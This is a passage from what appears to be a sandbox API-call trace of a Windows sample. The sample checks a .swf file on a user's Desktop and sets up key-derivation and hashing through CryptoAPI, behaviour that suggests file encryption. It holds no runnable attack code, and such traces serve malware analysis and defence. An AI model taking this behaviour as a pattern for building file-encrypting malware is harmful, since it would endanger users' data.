lpString2=".", cchCount2=1) returned 3 [0076.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.230] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0076.230] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0076.230] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0076.230] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0076.230] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.230] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0076.230] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x394ea870, ftCreationTime.dwHighDateTime=0x1d5e43a, ftLastAccessTime.dwLowDateTime=0xdee48600, ftLastAccessTime.dwHighDateTime=0x1d5d905, ftLastWriteTime.dwLowDateTime=0xdee48600, ftLastWriteTime.dwHighDateTime=0x1d5d905, nFileSizeHigh=0x0, nFileSizeLow=0x110a7, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="6iBbdX1qsRyDlZ.swf", cAlternateFileName="6IBBDX~1.SWF")) returned 0x6b89f8 [0076.231] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0076.231] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0076.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0076.231] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.231] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0076.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.231] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.231] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0076.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0076.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.231] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0076.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0076.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0076.231] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0076.231] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.232] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0076.232] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.232] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.232] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0076.232] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.232] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0076.232] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.232] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0076.232] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.232] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.232] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.232] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0076.233] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.233] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.233] PeekMessageW (in: lpMsg=0x61e57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e57c) returned 0 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.233] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0076.233] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x696a48) returned 1 [0076.234] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0076.235] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1ca8 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0076.235] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.235] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0076.235] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0076.235] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.235] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.235] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.235] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.235] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.235] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.236] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.236] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.236] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0076.236] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.236] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.236] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0076.236] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da68 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.236] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0076.236] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.236] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.237] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.237] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0076.237] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.237] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.237] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.237] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.237] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.237] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.237] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8af8 [0076.237] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0076.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.237] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.238] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0076.238] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.238] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0076.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5d8 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.238] CryptCreateHash (in: hProv=0x696a48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0076.238] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1ca8 [0076.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0076.239] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.239] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0076.239] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0076.239] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b480 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0076.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5d8 [0076.240] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96e8 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b480 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.240] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.240] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.240] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 